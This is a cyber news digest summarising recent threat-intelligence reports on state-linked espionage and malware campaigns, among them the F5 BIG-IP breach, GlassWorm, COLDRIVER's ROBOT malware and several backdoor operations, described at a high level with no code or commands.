Latest Cyber News

F5 disclosed a breach where unidentified threat actors stole files containing BIG-IP's source code and undisclosed vulnerabilities. The attackers used BRICKSTORM malware, attributed to a China-nexus espionage group dubbed UNC5221. The breach, discovered on August 9, 2025, had been ongoing for at least 12 months. Over 680,000 F5 BIG-IP devices are visible on the public internet, with the majority located in a country, followed by Germany, France, Japan, and another country.

Researchers from Elastic Security Labs and Texas A&M University System Cybersecurity uncovered a widespread campaign by a Chinese-speaking threat actor exploiting misconfigured Microsoft IIS servers. The attackers deployed a malicious IIS module called TOLLBOOTH, a modified Hidden rootkit, and a Godzilla-forked webshell framework to maintain persistence and hide operations. The campaign, designated REF3927, involved deserialization attacks against ASP.NET machine keys and affected 571 servers across various industries.

The state-sponsored hacker group MuddyWater has targeted over 100 government entities in a recent phishing campaign. Starting August 19, the group used a compromised email account accessed via NordVPN to send malicious Word documents with macro code. The campaign deployed version 4 of the Phoenix backdoor, which gathers system information and connects to a command-and-control server. Most targets were embassies and diplomatic missions, with the attack likely aiming to gather intelligence from compromised systems.

The Bitter APT group, also known as APT-Q-37, has been discovered using malicious Office macros and a previously undocumented WinRAR vulnerability to deploy a C# backdoor. This dual-pronged attack targets high-value sectors such as government, electric power, and military. The group, believed to operate from a South Asian base, has been active for several years, conducting highly targeted espionage operations. Researchers warn of the group's evolving tactics and urge organizations to adopt multi-layered defense strategies, including disabling macros and applying patches.

Google’s Threat Intelligence Group (GTIG) has uncovered a significant evolution in the operations of COLDRIVER, a state-sponsored threat actor. Within days of the public disclosure of its LOSTKEYS malware, COLDRIVER deployed a new malware ecosystem dubbed the 'ROBOT' family. This includes NOROBOT, YESROBOT, and MAYBEROBOT, delivered through an updated ClickFix lure disguised as a CAPTCHA test. The group's swift response demonstrates a well-resourced capability to rebuild and rearm after exposure. The new ROBOT-linked malware has been used more aggressively than previous campaigns, highlighting COLDRIVER's persistent effort to evade detection while targeting high-value entities.

The PassiveNeuron cyberespionage campaign has re-emerged after a six-month hiatus, targeting government, financial, and industrial organizations with sophisticated malware implants. The campaign primarily exploits Microsoft SQL servers to gain initial access, leveraging vulnerabilities or brute-forcing credentials. Once inside, attackers deploy ASPX web shells and adapt their techniques to evade detection. The campaign employs custom malware like Neursite and NeuralExecutor, along with the Cobalt Strike framework, demonstrating remarkable adaptability and persistence.

A new supply-chain attack, GlassWorm, is targeting developers on OpenVSX and Microsoft Visual Studio marketplaces. The malware uses invisible Unicode characters to hide its code and spreads using stolen account information. It leverages the Solana blockchain for command-and-control, making takedown difficult. Researchers found that the malware has been installed an estimated 35,800 times and can steal credentials for various platforms and cryptocurrency wallet data.

FortiGuard Labs has uncovered a sophisticated cross-regional campaign by Winos 4.0 hackers, initially targeting users with phishing PDFs disguised as official documents. The campaign has evolved, using custom domains and multi-stage loaders to deliver the HoldingHands payload. The malware employs DLL sideloading and privilege escalation techniques, making detection challenging. The latest variant includes a new C2 task that updates the server IP address via registry entry, showcasing the group's growing sophistication. Analysts have linked the infrastructure to new campaigns, highlighting the threat actors' reliance on phishing lures and layered evasion tactics.

Researchers at SEQRITE Labs have uncovered a targeted spear-phishing campaign aimed at organizations in the automobile and e-commerce sectors. The operation, active since early October 2025, deploys a previously undocumented .NET-based backdoor dubbed CAPI, designed for credential theft, system reconnaissance, and persistent access. The attack chain uses tax-related decoy documents to lure employees and executes the payload through rundll32.exe, a legitimate Windows binary, to evade detection. The infection begins with a malicious ZIP archive named Payroll Recalculation as of October 1, 2025. Inside the ZIP, analysts found both LNK and PDF files, a common spear-phishing tactic to disguise executable payloads as legitimate business documents.

A new report from NTT Security Japan highlights the evolved malware family OtterCandy, attributed to the WaterPlum group. This campaign showcases advanced multi-platform intrusion capabilities, targeting Windows, macOS, and Linux. OtterCandy, built with Node.js, functions as both a Remote Access Trojan (RAT) and an Information Stealer, combining elements from earlier espionage tools. The malware's latest update enhances its persistence and data-theft capabilities, including an anti-forensic module that removes traces after execution.